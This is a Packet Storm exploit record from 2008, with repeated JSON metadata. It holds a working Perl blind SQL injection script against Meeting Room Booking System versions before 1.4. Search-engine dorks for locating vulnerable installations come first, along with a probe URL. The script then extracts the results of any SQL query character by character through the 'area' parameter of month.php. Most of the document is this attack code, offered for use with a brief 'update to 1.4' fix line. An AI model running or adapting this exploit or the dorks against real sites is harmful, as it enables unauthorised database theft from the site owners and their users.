ID PACKETSTORM:71044
Type packetstorm
Reporter Xianur0
Modified 2008-10-18T00:00:00
Description
`# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)".
# Web CMS: http://sourceforge.net/projects/mrbs/
# Affected: Previous versions of mrbs 1.4
# Solution: Update to Version 1.4
# Doorks:
# "Meeting Room Booking System" "month.php?area="
# "Meeting Room Booking System" "day.php?area="
# "Meeting Room Booking System" "week.php?area="
# Author: Xianur0
# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0
# Exploit:
#!/usr/bin/perl
#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()'
#
#Exploit MRBS By Xianur0
#
#Please Have Patience, The Blind SQL Injection is running.........
#pma@localhost
#
#
#Finished!
#
# By Xianur0
use LWP::UserAgent;
%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z");
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0];
$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n";
$caracter = 1;
$i=0;
$detector = '<h1>No rooms defined for this area</h1>';
$simbolo = ">";
while($caracter ne "finito") {
$req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content !~ $detector) {
if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
} else {
print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
}
}
print "\nFinished!\n";
`
{"type": "packetstorm", "published": "2008-10-18T00:00:00", "reporter": "Xianur0", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9d530a155919d687f47ba10ba01e014a"}, {"key": "modified", "hash": "02475ae3322ae6f670b18b778a2df2a6"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "02475ae3322ae6f670b18b778a2df2a6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d9aff1d2a8a6293f33a8c45b343ee422"}, {"key": "sourceData", "hash": "20577c12b868427b271f3a3dcd87049f"}, {"key": "sourceHref", "hash": "8e875ab2447ea450725b8dda5ccf1497"}, {"key": "title", "hash": "4f7a18cf6049f5d5c390043d67c6ff52"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`# \"MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)\". \n \n# Web CMS: http://sourceforge.net/projects/mrbs/ \n# Affected: Previous versions of mrbs 1.4 \n# Solution: Update to Version 1.4 \n \n# Doorks: \n# \"Meeting Room Booking System\" \"month.php?area=\" \n# \"Meeting Room Booking System\" \"day.php?area=\" \n# \"Meeting Room Booking System\" \"week.php?area=\" \n \n# Author: Xianur0 \n# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0 \n \n# Exploit: \n \n#!/usr/bin/perl \n \n#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()' \n# \n#Exploit MRBS By Xianur0 \n# \n#Please Have Patience, The Blind SQL Injection is running......... \n#pma@localhost \n# \n# \n#Finished! \n# \n \n \n# By Xianur0 \n \nuse LWP::UserAgent; \n \n%ascii = (\"32\", \" \",\"32\", \" \",\"33\", \"!\",\"34\", '\"',\"35\", \"#\",\"36\", '$',\"37\", \"%\",\"38\", \"&\",\"39\", \"'\",\"40\", \"(\",\"41\", \")\",\"42\", \"*\",\"43\", \"+\",\"44\", \",\",\"45\", \"-\",\"46\", \".\",\"47\", \"/\",\"48\", \"0\",\"49\", \"1\",\"50\", \"2\",\"51\", \"3\",\"52\", \"4\",\"53\", \"5\",\"54\", \"6\",\"55\", \"7\",\"56\", \"8\",\"57\", \"9\",\"58\", \":\",\"59\", \";\",\"60\", \"<\",\"61\", \"+\",\"62\", \">\",\"63\", \"?\",\"64\", '@',\"65\",\"A\",\"66\",\"B\",\"67\",\"C\",\"68\",\"D\",\"69\",\"E\",\"70\",\"F\",\"71\",\"G\",\"72\",\"H\",\"73\",\"I\",\"74\",\"J\",\"75\",\"K\",\"76\",\"L\",\"77\",\"M\",\"78\",\"N\",\"79\",\"O\",\"80\",\"P\",\"81\",\"Q\",\"82\",\"R\",\"83\",\"S\",\"84\",\"T\",\"85\",\"U\",\"86\",\"V\",\"87\",\"W\",\"88\",\"X\",\"89\",\"Y\",\"90\",\"Z\",\"95\",\"_\",\"97\", \"a\", \"98\", \"b\", \"99\", \"c\", \"100\", ,\"d\",\"101\",\"e\", \"102\", \"f\", \"103\",\"g\", \"104\", \"h\", \"105\",\"i\", \"106\", \"j\", \"107\",\"k\", \"108\", \"l\", \"109\",\"m\", \"110\", \"n\", \"111\",\"o\", \"112\", \"p\", \"113\",\"q\", \"114\", \"r\", \"115\",\"s\", \"116\", \"t\", \"117\",\"u\", \"118\", \"v\", \"119\",\"w\", \"120\", \"x\", \"121\",\"y\", \"122\", \"z\"); \n \n$ua = LWP::UserAgent->new; \n$ua->agent(\"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\"); \n$url = $ARGV[0]; \n$sql = $ARGV[1] || die(\"Use: blind.pl [Complete URL] [SQL Injection]\\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\\n\"); \nprint \"\\nExploit MRBS By Xianur0 \\n\\nPlease Have Patience, The Blind SQL Injection is running.........\\n\"; \n$caracter = 1; \n$i=0; \n$detector = '<h1>No rooms defined for this area</h1>'; \n$simbolo = \">\"; \nwhile($caracter ne \"finito\") { \n$req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i); \n$req->header('Accept' => 'text/html'); \n$res = $ua->request($req); \nif ($res->is_success) { \nif($res->content !~ $detector) { \nif($base eq $i) { print \"$ascii{$i}\"; $caracter++; $i=0; $simbolo = \">\";} \n$base = $i; \n$i = $i+10; \n} else { if($i eq 0) { print \"\\nError Performing Blind (Less Value to 0)!\\n\"; $caracter = \"finito\";} else {$i = $i-1; $simbolo = \"=\";} \n} \n} else { \nprint \"\\nError detected in HTTP requests: \" . $res->status_line . \"!\\n\"; \n} \n} \n \nprint \"\\nFinished!\\n\"; \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:22:07", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/71044/mrbs-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/71044/mrbs-sql.txt", "title": "mrbs-sql.txt", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:22:07"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:07"}, "vulnersScore": -0.4}, "references": [], "id": "PACKETSTORM:71044", "hash": "67a66a27010dcead0f2ae719c84a6d7a74c9a39a3dac45748719936d11221225", "edition": 1, "cvelist": [], "modified": "2008-10-18T00:00:00", "description": ""}
{}
